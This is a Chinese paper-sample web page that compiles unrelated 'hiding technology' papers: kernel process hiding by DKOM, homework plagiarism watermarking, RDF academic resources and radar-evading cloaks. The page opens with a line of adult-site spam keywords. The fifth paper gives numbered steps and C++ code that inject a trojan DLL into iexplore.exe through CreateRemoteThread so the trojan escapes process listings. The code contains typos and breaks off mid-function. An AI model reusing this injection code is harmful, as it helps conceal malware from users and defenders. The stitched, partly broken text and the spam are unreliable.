五月激情开心网,五月天激情社区,国产a级域名,婷婷激情综合,深爱五月激情网,第四色网址

隱藏技術論文優選九篇

時間:2023-02-28 15:55:27

引言:易發表網憑借豐富的文秘實踐,為您精心挑選了九篇隱藏技術論文范例。如需獲取更多原創內容,可隨時聯系我們的客服老師。

隱藏技術論文

第1篇

關鍵詞:進程隱藏 Windows server 2008 DKOM技術 WDM驅動編程

中圖分類號:TP3 文獻標識碼:A 文章編號:1007-9416(2013)03-0110-02

1 引言

Windows Server 2008是專為強化新一代IPv6網絡、應用程序和Web服務的功能而設計的服務器系統。該系統雖是建立在Windows Server先前版本的成功與優勢上,但是也因此繼承了Windows系列操作系統的一些可能被病毒所利用的傳統特征,如進程隱藏機制。所謂進程隱藏就是在用戶不知情的情況下悄悄執行自己的代碼。惡意代碼通常通過隱藏自身進程信息,在用戶察覺不到的情況下植入破壞性代碼或竊取用戶保密信息。進程隱藏,一直是病毒、木馬程序設計者不斷探求的重要技術,因為這些進程都需要很好的隱藏和保護自身信息。

當前,伴隨著Windows服務器系統功能的日益發展與完善,木馬技術也緊跟發展,使得木馬在系統中更具隱藏性,更具危害性。本文在此背景下研究進程隱藏機制,將有助于進一步了解和掌握木馬技術的發展方向,有助于采取更有力的應對措施。了解進程隱藏技術,是開發防病毒和木馬軟件的基礎,同時也助于促進信息安全技術的發展。

有些情況下,進程隱藏也是某些類型程序所需要的功能,如某些系統安全控制程序,例如網絡流量監控系統,這種程序需要在服務器系統中長駐,不能隨意停止和卸載,這則要求進程能有效保護和隱藏自己,以防止用戶惡意刪除和卸載。在當前企業中要求提供高度安全的網絡基礎架構,以提高和增加技術效率與價值的大趨勢下,分析此背景下木馬實現的關鍵技術,必將具有重要的的現實意義。

2 Windows系列操作系統中的進程隱藏技術

進程是程序運行的基礎,因此檢查進程也就成了查殺木馬的關鍵環節,所以,對木馬設計者而言,成功隱藏自己的進程信息,就是其最重要的基礎工作。隨著木馬技術的不斷發展,進隱藏技術也在不斷發更新。

進程隱藏技術在不斷的發展中,在Win NT架構服務器時代,第一代進程隱藏技術就已經出現。早在Windos 98系統當中,微軟公司就提供了一種將進程注冊為服務的方法,這種技術稱為Pegister Service Process。

由于這種隱藏技術存在嚴重的版本限制性,從而引發了第二代進程隱藏技術的研究,稱之為進程插入。利用的技術有DLL插入技術、遠程線程插入技術等,這種隱藏技術較之第一代更為高級和隱藏。繼進程插入技術之后,新的進程隱藏技術又飛速發展,稱為HOOK API技術。Windows系統給開發人員提供了幾種列出系統中所有的進程、模塊與驅動程序的方法,最常見的也是最常用的方法就是調用系統API;Create Tool Help 32 Snapshot、Enum Process、Enum Process Modules等,它們是獲取進程列表的第一層手段,調用這幾個API函數,就可以得帶系統當前運行進程的返回列表。

這幾個API在接到請求后會調用ZW Query System Information,Zw Query Ststem Information,會調用Ki System Service切入內核進入ring0權限,然后自SSDT表(System Service Descriptor Table,系統服務分配表)中查得Nt Query System Information的地址,并調用其指向的實際代碼,其運行原理是從系統的數據結構中取相應的數據,再返回給調用者。

在此過程中,在任何一個環節上進行攔截都可以實現隱藏進程的目的,在切入內核進入root0權限前進行HOOK,稱為用戶模式HOOK,而在之后進行HOOK則是內核模式HOOK,后者需要驅動才能實現。它比前幾種技術更為成熟。這種技術使得木馬不必將自己插入到其他進程中,即可實現自身信息的隱藏。

更為高級的技術是DKOM―直接內核對象修改技術,是由木馬程序將自身的進程信息從Windows服務器系統用以記錄進程信息的“進程鏈表”中刪除,這樣進程管理工具就無法從“進程鏈表”中獲得木馬的進程信息。Windows服務器系統枚舉進程使用的是活動進程列表Ps Active process list,所有結點通過EPROCESS結構中的Active Process Links 雙向指針鏈在一起。EPROCESS結構中有個雙向鏈表LIST_ENTRY結構,這個結構有兩個DWORD指針成員FLINK和BLINK,這兩個指針分別指向當前進程的前一個和后一個進程。要隱藏某個進程,只需修改對應ERPOCESS的Active Process Links,將其從鏈表中摘除。只要把當前進程的前一個進程的BLINK指向當前進程后一個進程的FLINK,再把當前進程后一個進程的FLINK指向當前進程前一個進程的FLINK。由于系統執行線程調度使用的是其他的數據結構,因此這種修改不會影響進程運行。

3 對DKOM進程隱藏技術的模擬與驗證

在研究的各種進程隱藏技術中,最有效的是DKOM(Direct Kernel Object Manipulation,DKOM 直接內核對象修改技術)。這種技術繞過了對象管理器,直接對內核對象進行操作,從而繞過了所有關于對象的訪問檢查,徹底實現了進程隱藏。由于這種技術直接操作內核對象,需要ring0的運行權限,所以必須通過WDM驅動開發來實現。

在實現過程中,作者首先配置了Windows Server 2008平臺上的驅動開發環境;然后對驗證程序進行了詳細設計,明確每個模塊需要實現的功能;最后針對不同的模塊一一探尋實現機理,如在編碼的過程中,反匯編了重要的內核函數Ps Get Current Process,并利用WinDBG等工具剖析了Windows內核中重要的數據結構,從而深入揭示了改函數返回當前進程結構EPROCESS的原因。

即使隱藏了進程信息,管理員通過查找驅動文件信息還是可能發現該進程。本研究在實現進程隱藏的基礎上,進一步實現了驅動的隱藏,利用的原理也是直接內核修改,從加載的模塊雙向鏈表中摘除驅動信息。

4 結語

利用DKOM技術編碼隱藏進程之后,利用Windows server 2008中的資源管理器、Process Explorer、EF Process Manager、Antiy Ports、Process Viewer、Proscan六種主流的進程查看工具分別進行查看,都沒有查看到被隱藏的進程。研究結果表明,這種技術可以很好地實現隱藏。

研究進程隱藏技術對于信息安全領域有非常重要的作用,通過研究內核層面的進程隱藏機制可以保障主機多種安全,如限制內核模塊的任意加載,防止黑客插入惡意模塊傳播病毒、留下后門、修改重要文件和銷毀攻擊痕跡,防止部分系統功能被非法終止等。研究進程隱藏機制可大大增強主機的安全性,使用戶在使用工程中避免惡意代碼的破壞。信息安全將是未來發展的一個重點,攻擊和偵測都有一個向底層靠攏的趨勢。未來病毒和反病毒底層化是一個逆轉的事實,這些方面的研究可以在保護服務器內關鍵信息免遭黑客侵害、積極保護用戶的數據的方面為研究人員提供寶貴的經驗。

參考文獻

[1]張新宇,卿斯漢,馬恒太,張楠,孫淑華,蔣建春.特洛伊木馬隱藏技術研究[J]. 通信學報. 2006(07).

[2]劉穎.Windows環境惡意代碼檢測技術研究[D].電子科技大學,2007.

第2篇

關鍵詞:電子作業;抄襲檢查;文檔指紋;信息隱藏

中圖分類號:TP311 文獻標識碼:A 文章編號:1009-3044(2012)36-8679-02

隨著計算機應用的普及,高校正在逐步實現作業的電子化和網絡化。這種作業形式的改革有效減少了教育資源的浪費,減輕了教師的工作任務,提高了學生獲得作業批閱結果的效率,教與學得到了互動。應該說作業的電子化是高校教學改革的一種必然趨勢,但隨之而來的是電子作業抄襲現象嚴重。學生抄襲作業時,少則部分復制他人文檔,調整文檔順序,內容稍做修改;多則大部分甚至全盤拷貝他人文檔。學生對于電子作業的抄襲輕松快捷又不易被識別,這就成為作業改革受到嚴重困擾的主要因素。

在電子作業的反抄襲檢查工作上,教師的手工操作既耗時又費力,尤以高校學生人數眾多,涉及的教師面而變得局限性很大。那么,建立一種快速、準確、高校的電子作業反抄襲檢查模型若能夠有效遏制了學生間電子作業相互拷貝,具有十分現實的意義。目的在于能夠極大地提高教學的質量和效率,并有力的促進高校的教育改革。在應用領域抄襲檢測算法已成為當前研究的熱點話題,尤其是在學術論文的剽竊比對上。而我們能夠在平時的教學工作中有效地抵制電子作業的抄襲現象,既能真實反映教學效果又能提高學生自主學習的意識和能力。這不僅是對于教學工作的促進更是培養人教育人的有效途徑。

1 抄襲檢查技術

計算機技術的發展和網絡普遍應用,在無意間方便了很多人進行文章抄襲。其實電子作業抄襲現象是國內外的大學廣泛存在的現象,為了有力遏制學生的這種不誠信的行為,國外早在20世紀90年代就開始了相應研究。由于西方語系的特點英語是以空格作為單詞間隔,因此英語的抄襲檢查方法是通過比較關鍵詞來判斷相似性的,效率很高。而中文與外文間存在著巨大的差異性, 強調詞法與句法,因此關鍵詞比對較不適用于中文。

目前中文的抄襲檢查方法主要有基于字符串的匹配、基于統計的中文分詞、文檔指紋、句子相似度等。

2 電子作業反抄襲檢查的實現

該文主要采用兩種方法以實現電子作業的反抄襲檢查:數字指紋技術和信息隱藏技術。首先吸取了文數字指紋技術的優勢并對于指紋技術的算法(Hash函數)做出改進提出一種基于局部詞頻的指紋算法。其次很多高校特有應用的實驗實習電子作業,此時內容都較為相似,所以該文又增加了基于信息隱藏技術的作業反抄襲檢查方法,以對于這類電子作業進行有效的比對。

2.1基于局部詞頻的指紋技術

文檔數字指紋技術是依據生成的待比較的文檔指紋,通過在樣本庫中做對比進行抄襲檢測。當相匹配指紋數目超過一定值時,可認定存在抄襲行為。為使其具有推廣力,一般會引入松弛因子以提高檢測的準確性。指紋生成算法是文檔數字指紋技術的關鍵,一般利用 Hash 函數對文檔中的特征標記進行計算,獲得整數值。一般需要計算函數。

在高校的電子作業中很多都僅是對作業的句子的長度或詞語的先后次序作了調整,內容的變化是較小的,用這種方法就會過度精確,用于檢查電子作業效率很低。所以該文對這種算法做出一定改進,提出一種基于詞頻統計的指紋技術。局部詞頻統計技術借助于向量空間模型來實現。這種向量空間模型是由句子為單位構成的,并對句子進行關鍵詞提取,并對關鍵詞重新排序構建,根據編碼與詞頻共同獲取句子的指紋。依據句子的指紋獲取文本相似度,具體的算法描述

2.2信息隱藏技術

在高校學生作業有一些是比較特殊的,例如在機房中完成的實驗實習類報告,這類作業的特點是內容大致是相同的。可以在作業的源頭采用一些基于信息隱藏的嵌入水印算法。在對作業進行片段拷貝時就在源頭嵌入水印,能有效的防止拷貝抄襲的現象發生。這樣即使電子作業的內容完全相同也能有效的檢查到。不能輕易被破壞。這類作業防抄襲檢查的水印嵌入既要求字符格式改變不易被擦覺也要兼顧有較大的信息嵌入量,不需太多的字符就能嵌入進機房的機器號及上機完成作業的時間。

由于人眼的視細胞對顏色敏感度的理論指出人眼對綠色最敏感,其次是紅色,而對于藍色是最不敏感的。而計算機的顏色設置理論是數字化的,所以可以對于RGB()的值中低位的值做秘密信息嵌入??梢詫值和G值改變都改變最低的1位bit,而對B值最低的2位bit。這樣就對每個電子文檔的字符嵌入了4位bit的信息隱藏,并把這4位二進制作為嵌入信息隱藏1Byte的高4位。同時也可以利用字符下劃線的B值最低2位bit,G值的最低1位bit,和R值的最低1位bit來隱藏4位信息。這4位bit作為嵌入信息隱藏1Byte的低4位。

在實際操作中程序所嵌入的信息包括程序讀取的機器號及上機時間與機房管理系統數據庫配合能準確定位學生的學號、姓名、班級等。當學生完成自己的電子作業過程中點擊保存、Word程序自動保存、關閉Word文檔時都會觸發這一嵌入秘密信息的相關程序的運行,可以在全文實現循環嵌入秘密信息的作用。該反抄襲程序是在打開作業文檔時自動運行,能自主識別學生作業中具有抄襲嫌疑的片段,協助教師對學生的作業給出客觀評價,有效的對這類作業的抄襲起到屏蔽的作用。

3 結束語

在以往的反抄襲檢查中主要是通過文檔間內容重疊程度或者相似程度來斷定的,相關的檢查技術也很多也較成熟。但往往面對的是海量數據或是長文檔,并需要對文檔字符做精確檢查。而在教學過程中的電子作業無論在內容、篇幅和數量方面都有很大差別。

該文的創新點是結合了基于局部詞頻的指紋技術和嵌入水印的信息隱藏技術,提出了一處主要針對高校的作業特點的反抄襲檢查的模型。較為全面的考慮到了這類作業不同于學術剽竊的相關問題,所建立的這種快速、準確、高效的電子作業反抄襲檢查模型能夠在一定程度上遏制學生間電子作業相互拷貝,具有十分現實的意義。

參考文獻:

[1] 蔣波.一種基于三重DES和RSA的綜合加密方案[J].微計算機信息,2007(18).

[2] 陳國良.并行算法實踐[M].北京:高等教育出版社,2004.

[3] 秦玉平,冷強奎,王秀坤,等. 基于局部詞頻指紋的論文抄襲檢測算法[J].計算機工程,2011(6).

[4] 付兵.基于信息隱藏技術的電子作業防抄襲研究[J].微計算機信息,2009(18).

第3篇

關鍵詞:語義Web;RDF;學術資源;本體

中圖分類號:TP391文獻標識碼:A文章編號:1009-3044(2012)09-1985-03

An RDF-based Integration Model of Academic Resources

YAO Jin-feng1, CHEN Lei2

(1.School of Computer Science and Engineering, Anhui University of Science and Technology, Huainan 232001, China; 2.Department of Computer and Information Engineering, Huainan Normal University, Huainan 232038, China)

Abstract: Resources like papers or thesises can be abstraced as knowledge base. After analysed, we find it is appropriate to describe the Web objects of the academic resources using the Resource Description Frame(RDF) statements, and also, we can create the academic ontology with OWL. This paper proposes a mechamism of the semantic query and logical inference, deploys a academic resource knowledge discovery system which has the characters of the Semantic Web, and it will faciliate the user query and the management.

Key words: semantic web; RDF; academic resources; ontology

1概述

對于高校的教師和學生而言,論文之類的學術資源是一種從事學習和科研的重要知識資源,對它們的搜索與發現也是教師和學生的知識獲取的重要手段。為了幫助用戶的搜索,各高校和一些相關機構都推出了一些論文查詢機制(如萬方、維普等),極大地方便了相關人群的使用。

論文資源的組織本質上屬于知識管理工程。知識管理所關注的是在一個組織中獲取、處理和維護知識。對于大型論文資源庫而言,有效地進行知識管理,在機構內部實施先進科學的知識組織與維護方式,對外則提供高效、高質量的用戶查詢(咨詢)服務則是相關機構創造新的價值和增強競爭力的有效保證。目前大多數可用信息只具有弱結構組織形式,從知識管理的角度來說,現有技術存在以下諸方面的局限[1]:

1)信息搜索。當今的互聯網通常依靠基于關鍵詞的搜索引擎,這使得搜索的結構總是“高匹配、低精度”,而且從搜索結果的形式來看,總是單一的網頁,如果所需要的信息分布在不同的文檔中,則用戶必須給出多個查詢來收集相關的頁面,然后自己提取這些頁面中的相關信息并組織成一個整體。

2)信息抽取。需要人工瀏覽搜索的文檔,當前的信息組織形式還不能滿足智能軟件(Intelligent Agent)的要求。

3)信息維護。比如術語的不相容性和無法移除過時的信息等。

4)信息挖掘。雖然可以用數據挖掘(Data Mining)等手段提取隱藏在信息數據庫中的新知識,但對于分布式的、弱結構化的文檔集合,這個任務仍然是困難的。

5)信息視圖。經常需要限制某些用戶對某些信息的瀏覽權限?!耙晥D”意味著隱藏某些信息,在傳統數據庫中很容易做到這一點,但對于論文資源服務網站來說尚難以實現。

基于本體的論文資源語義網的研究的主要目的就是解決上述問題,并借助于自動推理機從給定的知識演繹出一些結論,從而使隱含的知識外顯出來,并以期通過相應的(Agent)收集和整理信息,為用戶提供備選方案。

2語義Web技術基礎

語義Web研究的重點就是如何把信息表示為計算機能夠理解和處理的形式,即帶有語義。它主要基于XML和RDF/RDFS[2],并在此之上構建本體和邏輯推理規則,它完全基于語義的知識表示和推理,從而能夠為計算機所理解和處理。

語義網的核心是本體。R.Studer給本體的定義是“一個本體是一個概念體系(Conceptualization)的顯式的形式化規范”[3]。一個典型的本體由有限個術語以及它們之間的關系組成。術語(Term)指給定論域中的重要概念(如對象和類)。例如,以論文資源為例,標題、關鍵字、主題、作者等,都是術語。本體中概念之間的關系通常包括類的層次結構。除了子類關系外,本體還可以包括以下信息:屬性、值約束、不相交描述和對象間邏輯關系的規定等。語義網通過網絡本體語言來定義本體,以本體清晰明確地表達各種詞匯集和網絡上的不同數據資源間的語義關系,從而在網絡上實現不同詞匯集和數據資源間的共享以及基于網絡的語義查詢和推理。因此,在Web中,本體提供了對給定領域的一種共識,這種共識對于消除術語差別是必要的。本體尤其可以用于提高網絡搜索的精確度,這是因為搜索引擎可以精確地根據本體中的概念查找相關頁面,而不是收集所有出現某些關鍵詞的頁面,這樣就保證了查詢的結果。另外,可以利用本體在網絡搜索中試探更一般或更特殊的查詢。如果一個查詢失敗了,沒有找到相關文檔,看見過引擎可以向用戶推薦更一般的查詢。甚至可以考慮讓搜索引擎主動執行這樣的查詢。

W3C推薦標準是RDF(Resource Description Framework)[2]。它實際上是一個數據模型(Data-Model)。它由一系列陳述(Statement)即“對象-屬性-值”三元組,由此,RDF的數據模型可以很方便地描述對象以及它們的關系。實際上,RDF只提供二元謂詞(屬性)。由于任何復雜的關系都可以分解為多個二元關系,因此RDF的數據模型可以作為其他任何復雜關系模型的基礎模型。通過RDF,可以將基于關鍵詞的檢索更容易地推進到基于語義的檢索。

語義網的基本技術主要包括表示語言(本體開發)、查詢語言、轉換和推理技術以及相關工具等。其中本體的開發是整個語義網的構建基礎,它包括以下一些階段:確定范圍、考慮復用、列舉術語、定義分類、定義屬性、定義側面、定義實例和檢查異常等??梢猿浞掷靡延械谋倔w或元數據,如都柏林核心元數據(Dublin Core metadata terms)[4]是廣為使用的用于資源描述與發現的標準,在利用RDF描述資源時,可以使用其中的一些概念,都柏林核心元數據中典型的概念包括:Title、Creator、Subject等。

從現有知識源(如文本、詞典、遺留知識庫或本體、數據庫模式等)獲取領域知識、以(半)自動方式構造或改編本體即所謂的本體學習(ontology learning),是開發本體的有效途徑。由河海大學許卓明教授等提出的“從ER模式到OWL DL本體的語義保持的翻譯”較好的實現了這一問題,從而使用戶可以方便地將ER模式翻譯成OWL DL本體[5]。

邏輯推理是語義網的重要內容,根據RDF和RDF Schema建模原語,它所使用的形式語言是謂詞邏輯(predicate logic),這通常被認為是所有(基于符號的)知識表示的基礎。用邏輯描述RDF和RDFS的語義排除了二義性,并且是機器可讀的,同時也為借助邏輯推理機制支持RDF/RDFS的自動推理提供了基礎。但是,對于RDF和RDFS而言,它們可以表示某些本體知識,主要建模原主涉及以及類型層次組織起來的詞匯,包括子類關系和子屬關系、定義域和值域限定以及類實例,然而,還是有很多特性不支持,如屬性的局部轄域、類的不相交性、類的布爾組合、基數約束和屬性的特殊性質等。為此,在OWL中增加了一些原語以提供更強的表達能力,從而確保OWL的一些子語言(如OWL DL)對應于一個已經得到充分研究的描述邏輯系統。

3基于RDF的學術資源整合模型研究

在對論文資源庫進行特點分析后可以發現,論文資源庫屬于知識庫,傳統的論文資源基本上有著良好、統一的格式且有著較好的隱藏數據開發潛力,可以在傳統數據格式的基礎上容易地用XML根據用戶自定義的詞匯表編寫結構化網絡文檔,再利用RDF編寫關于網絡對象(論文資源)的簡單陳述句,利用OWL語言創作論文資源本體,給出相應的查詢和邏輯推理機制,最終將開發出具有新一代網絡特征的論文資源語義網絡,極大地方便了用戶的查詢和組織者的管理。

主要任務包括:

1)本體的產生

語義網上存在著各種本體,包括領域本體和全局本體。為了在進行信息檢索時有一個較為統一的模式,以便進行語義推理和檢索,要求定義全局本體的概念。可以從下幾個方面進行定義。

①領域本體:領域本體又稱為全局總體,它是對領域知識的明確清晰的表達,通常用本體語言來進行表述。在一些特定的實際應用中,領域本體及領域本體的合成是很有必要的。

②子領域本體:假定領域D能被分成n個子領域,那么領域D的領域本體也可以被分割成n個子領域本體。由于語義網上不同的領域本體通常用各種不同的本體語言來表述,在進行語義網信息檢索的時候需要將這些用不同本體語言表述的領域本體轉換成統一的形式。轉換過程中不可避免地會出現一些信息的丟失,因此,在進行轉換的同時,對來自同一個領域的領域本體進行一定的事例,得到新的領域本體。經過轉換后的本體就變成了全局本體,也就是用統一的形式表達的各種領域知識集,它能夠用更為精確和統一的方式來表達世界的知識集。領域本體轉換成全局本體的過程可以通過本體轉換工具半自動化地完成。

2)語義推理

推理是指從RDF文檔的顯式(explicit)知識出發,得到文檔中沒有顯式描述的隱藏(implicit)的知識。在OWL-DL所依賴的描述邏輯中,推理主要分為概念之間的包含推理(subsumption relationship inferences)和實例與類之間的實例推理(instance relationship inferences),可以利用這兩種推理在論文資源文檔中發現傳統搜索搜索不到的隱含信息。在RDFS的推理中,需要在前向鏈、反向鏈以及混合方式之間進行選擇。前向鏈將所有數據都交給推理引擎,產生新數據后加入到數據集中;而反向鏈采用邏輯編程技術,當數據模型接受查詢時,將查詢翻譯成目標,引擎利用反向鏈規則通過匹配三元組進行目標歸結。而混合方式則根據實際情況進行 不同的推理選擇。

3)信息檢索

與傳統的基于SQL的檢索方式不同,用戶提交的檢索形式是語義檢索,它有兩個目的,一是將用戶從具體苛刻的檢索關鍵詞中解放出來,用戶只需要了解一組與領域詞匯相關的本體詞條就可以構建成查詢語句;第二是可以通過推理查詢查詢到更加完備的結果。SPARQL[6]查詢語言是W3C的推薦標準,它以子圖匹配的方式在一組RDF數據集中進行匹配查詢。

系統的框架如圖1所示。在圖1中,用戶向系統提交語義查詢,系統在已有的語義資源庫中進行語義匹配,最終生成查詢結果。仍然可以對查詢結果進行語義相關性排序,限于篇幅,該文不對此進行研究。

學術資源庫主要通過對傳統的資源庫進行語義轉化而得到,這種轉換可以是實例的轉化,也可以是建立在傳統資源庫上的虛擬RDF視圖[7]。

圖1系統結構圖

4總結

該文提出一種基于語義Web相關技術的學術資源整合平臺模型,它以RDF、OWL本體形式組織學術資源,為用戶提供語義查詢的結構,通過OWL-DL的內部推理機制,滿足用戶的推理查詢要求,是對傳統的查詢系統的一種極大的改進。

參考文獻:

第4篇

這個電路板不光外形不像衣服,作用也和我們概念中的隱身衣大相徑庭。

事實上,它是一個偽裝裝置。將它布置在需要隱藏的物體周圍,就可以抵消外界信號的檢測,從而實現物體隱形或變形。它的工作原理,不是隱身衣研究領域常用的反射或吸收電磁波,而是用一種特殊的導電材料,通過設定參數、控制電流走向改變被隱藏物體的電磁特性,騙過雷達之類的探測設備——但是,它騙不過人的眼睛。

不論是可見光還是無線電波,在本質上都是電磁波,差別在于它們的頻率和波長不同。雷達的工作原理是通過天線把電磁波射向空間某一方向,當電磁波碰到處在此方向上的物體時,就被反射回來,雷達接收到這些電磁波后,對其進行詳細分析,便可知道該物體的具體信息,比如材質、形狀、高度、距離等。

蘭州大學的這個電路板干的就是發出錯誤的信息誤導此類探測器的事兒,通過一些特殊的參數設置,讓雷達把一輛坦克當成其他東西,比如一堆土或者一棵樹!如果再在外形上做一些偽裝,騙過人的眼睛,那它在軍事上的用處就非常了得了。

一些國家已經研發出用于偵查人員或者特種兵隱藏的反紅外偵察隱形衣。這種衣服的顏色和花紋會隨著周圍環境的變化而變化,就像變色龍一樣,同時,還能躲過敵人的紅外偵察器材監測。

從根本原理上說,它們都和隱形飛機一樣。

隱形飛機的設計原理就是通過形狀和材料的變化,躲過雷達的偵察。它們身上涂有特殊的材料,可以吸收、消解、干涉雷達射出的電磁波,使其收不到反射電磁波。

最早提出這一設計理念的人是蘇聯科學家彼得·烏菲莫切夫。他在1964年發表的論文《物理衍射理論中的邊緣波行為》中提出,物體對雷達電磁波的反射強度和它的大小無關,而和邊緣布局有關,并描述了飛機表面和邊緣的雷達反射面的計算辦法。但由于其他相關學科發展水平落后,他的設想一直停留在理論層面。

20世紀70年代初,美國洛克希德公司的科學家發現了烏菲莫切夫的論文,以他的研究為基礎,開始了著名的隱形飛機F-117的研發。1977年,F-117首飛,于1983年10月開始服役,在后來的海灣戰爭和南聯盟戰爭中大展神威。

第5篇

摘要進程的隱藏一直是木馬程序設計者不斷探求的重要技術,本文采用遠程線程技術,通過動態鏈接庫方法,較好地解決了這一問題,通過遠程線程將木馬作為線程隱藏在其他進程中,從而達到隱藏的目的。

關鍵字進程線程木馬動態鏈接庫

木馬程序(也稱后門程序)是能被控制的運行在遠程主機上的程序,由于木馬程序是運行在遠程主機上,所以進程的隱藏無疑是大家關心的焦點。

本文分析了WindowsNT/2000系統下進程隱藏的基本技術和方法,并著重討論運用線程嫁接技術如何實現WindowsNT/2000系統中進程的隱藏。

1基本原理

在WIN95/98中,只需要將進程注冊為系統服務就能夠從進程查看器中隱形,可是這一切在WindowsNT/2000中卻完全不同,無論木馬從端口、啟動文件上如何巧妙地隱藏自己,始終都不能躲過WindowsNT/2000的任務管理器,WindowsNT/2000的任務管理器均能輕松顯示出木馬進程,難道在WindowsNT/2000下木馬真的再也無法隱藏自己的進程了?我們知道,在WINDOWS系統下,可執行文件主要是Exe和Com文件,這兩種文件在運行時都有一個共同點,會生成一個獨立的進程,尋找特定進程是我們發現木馬的方法之一,隨著入侵檢測軟件的不斷發展,關聯進程和SOCKET已經成為流行的技術,假設一個木馬在運行時被檢測軟件同時查出端口和進程,我們基本上認為這個木馬的隱藏已經完全失敗。在WindowsNT/2000下正常情況用戶進程對于系統管理員來說都是可見的,要想做到木馬的進程隱藏,有兩個辦法,第一是讓系統管理員看不見你的進程;第二是不使用進程。本文以第二種方法為例加以討論,其基本原理是將自已的木馬以線程方式嫁接于遠程進程之中,遠程進程則是合法的用戶程序,這樣用戶管理者看到的只是合法進程,而無法發現木馬線程的存在,從而達到隱藏的目的。

2實現方法

為了弄清實現方法,我們必須首先了解Windows系統的另一種"可執行文件"----DLL,DLL是DynamicLinkLibrary(動態鏈接庫)的縮寫,DLL文件是Windows的基礎,因為所有的API函數都是在DLL中實現的。DLL文件沒有程序邏輯,是由多個功能函數構成,它并不能獨立運行,一般都是由進程加載并調用的。因為DLL文件不能獨立運行,所以在進程列表中并不會出現DLL,假設我們編寫了一個木馬DLL,并且通過別的進程來運行它,那么無論是入侵檢測軟件還是進程列表中,都只會出現那個進程而并不會出現木馬DLL,如果那個進程是可信進程,(例如瀏覽器程序IEXPLORE.EXE,沒人會懷疑它是木馬吧?)那么我們編寫的DLL作為那個進程的一部分,也將成為被信賴的一員,也就達到了隱藏的目的。

運行DLL方法有多種,但其中最隱蔽的方法是采用動態嵌入技術,動態嵌入技術指的是將自己的代碼嵌入正在運行的進程中的技術。理論上來說,在Windows中的每個進程都有自己的私有內存空間,別的進程是不允許對這個私有空間進行操作的,但是實際上,我們仍然可以利用種種方法進入并操作進程的私有內存。動態嵌入技術有多種如:窗口Hook、掛接API、遠程線程等,這里介紹一下遠程線程技術,它只要有基本的進線程和動態鏈接庫的知識就可以很輕松地完成動態嵌入。

遠程線程技術指的是通過在另一個進程中創建遠程線程的方法進入那個進程的內存地址空間。我們知道,在進程中,可以通過CreateThread函數創建線程,被創建的新線程與主線程(就是進程啟動時被同時自動建立的那個線程)共享地址空間以及其他的資源。但是很少有人知道,通過CreateRemoteThread也同樣可以在另一個進程內創建新線程,被創建的遠程線程同樣可以共享遠程進程(是遠程進程)的地址空間,所以,實際上,我們通過一個遠程線程,進入了遠程進程的內存地址空間,也就擁有了那個遠程進程相當的權限。

3實施步驟

1)用Process32Next()函數找到宿主進程,獲取宿主進程ID,并用

OpenProcess()函數打開宿主進程。

2)用VirtualAllocEx()函數分配遠程進程地址空間中的

內存。

3)用WriteProcessMemory()函數將待隱藏的DLL的路徑名。

4)拷貝到步驟二已經分配的內存中。

5)用GetProcAddress()函數獲取LoadlibraryA()函數的實地址(在kernel32.dll中)。

6)用CreateRemoteThread()函數在遠程進程中創建一個線程。

7)它調用正確的LoadlibraryA()函數。

8)為它傳遞步驟二中分配的內存地址。

4具體實例

下面是在C++Builder4.0環境下編寫的運用遠程線程技術隱藏木馬的程序代碼:

#include<vcl.h>

#include<windows.h>

#include<stdio.h>

#include<tlhelp32.h>//該頭文件包涵了進程操作的API函數

#pragmahdrstop

#include"Unit1.h"

#pragmapackage(smart_init)

#pragmaresource"*.dfm"

InsistingpszLibFileName;//存放待隱藏的DLL文件名

HANDLEhProcessSnap=NULL;//進程快照句柄

HANDLEhRemoteProcess;//遠程進程句柄

LPVOIDpszLibFileRemote;//遠程進程中分配給文件名的空間

HMODULEphmd;//存放kernel32.dll句柄

HANDLEhRemoteThread1=NULL;//存放遠程線程句柄

TForm1*Form1;

//---------------------------------------------------------

__fastcallTForm1::TForm1(TComponent*Owner)

:TForm(Owner)

{

}

//---------------------------------------------------------

void__fastcallTForm1::Button1Click(TObject*Sender

{

PROCESSENTRY32pe32={0};

DWORDdwRemoteProcessId;

hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//打開進程快照

if(hProcessSnap==(HANDLE)-1)

{

MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);

exit(0);

}//失敗返回

pe32.dwSize=sizeof(PROCESSENTRY32);

if(Process32Fi

rst(hProcessSnap,&pe32))//獲取第一個進程

{

do{

AnsiStringte;

te=pe32.szExeFile;

if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))

//找到宿主進程,以IEXPLORE.EXE為例

{dwRemoteProcessId=pe32.th32ProcessID;

break;

}

}

while(Process32Next(hProcessSnap,&pe32));//獲取下一個進程

}

else

{

MessageBox(NULL,"取第一個進程失敗","",MB_OK);

exit(0);

}

hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM

_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);

//打開遠程進程

pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";

//假設hide.dll是待隱藏的進程

intcb=(1+pszLibFileName.Length())*sizeof(char);//計算dll文件名長度

pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,

MEM_COMMIT,PAGE_READWRITE);

//申請存放文件名的空間

BOOLReturnCode=WriteProcessMemory(hRemoteProcess,

pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);

//把dll文件名寫入申請的空間

phmd=GetModuleHandle("kernel32.dll");

LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)

GetProcAddress(phmd,"LoadLibraryA");

//獲取動態鏈接庫函數地址

hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,

pfnStartAddr,pszLibFileRemote,0,NULL);

//創建遠程線

if(hRemoteThread1!=NULL)

CloseHandle(hRemoteThread1);//關閉遠程線程

if(hProcessSnap!=NULL)

CloseHandle(hProcessSnap);//關閉進程快照

}

該程序編譯后命名為RmtDll.exe,運行時點擊界面上的按鈕即可。

至此,遠程嵌入順利完成,為了試驗我們的hide.dll是不是已經正常地在遠程線程運行,我同樣在C++Builder4.0環境下編寫并編譯了下面的hide.dll作為測試:

nclude<vcl.h>

#include<windows.h>

#pragmahdrstop

#pragmaargsused

BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)

{

charszProcessId[64];

switch(reason)

{

caseDLL_PROCESS_ATTACH:

{//獲取當前進程ID

itoa(GetCurrentProcessId(),szProcessId,10);

